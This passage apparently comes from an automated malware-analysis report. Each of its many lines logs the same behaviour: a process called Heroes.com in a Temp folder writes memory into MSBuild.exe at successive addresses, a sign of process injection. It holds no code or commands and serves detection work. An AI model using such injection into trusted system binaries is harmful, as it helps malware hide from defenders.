                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347EF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347F58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347FBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348020Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348084Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13480E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134814CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13481B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348214Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348278Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13482DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348340Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13483A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348408Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134846CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13484D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348534Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348598Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13485FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348660Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13486C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348728Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134878CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13487F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348854Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13488B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134891CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348980Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13489E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348A48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348AACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348B10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348B74Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348BD8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348C3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348CA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348D04Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348D68Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348DCCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348E30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348E94Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348EF8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348F5CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348FC0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349024Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349088Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13490ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349150Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13491B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349218Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134927CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13492E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349344Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13493A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134940CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349470Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13494D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349538Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134959CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349600Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349664Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13496C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134972CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349790Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13497F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349858Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13498BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349920Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349984Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13499E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349A4CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349AB0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349B14Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349B78Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349BDCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349C40Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349CA4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349D08Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349D6CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349DD0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349E34Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349E98Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349EFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349F60Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1349FC4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A028Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A08CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A0F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A154Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A1B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A21CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A280Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A2E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A348Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A3ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A410Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A474Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A4D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A53CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A5A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A604Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A668Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A6CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A730Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A794Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A7F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A85CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A8C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A924Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A988Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134A9ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AA50Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AAB4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AB18Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AB7CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134ABE0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AC44Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134ACA8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AD0CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AD70Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134ADD4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AE38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AE9CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AF00Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AF64Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134AFC8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B02CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B090Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B0F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B158Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B1BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B220Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B284Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B2E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B34CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B3B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B414Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B478Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B4DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B540Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B5A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B608Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B66CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B6D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B734Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B798Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B7FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B860Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B8C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B928Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B98CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134B9F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BA54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BAB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BB1CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BB80Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BBE4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BC48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BCACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BD10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BD74Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BDD8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BE3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BEA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BF04Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BF68Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134BFCCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134C030Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134C094Jump to behavior
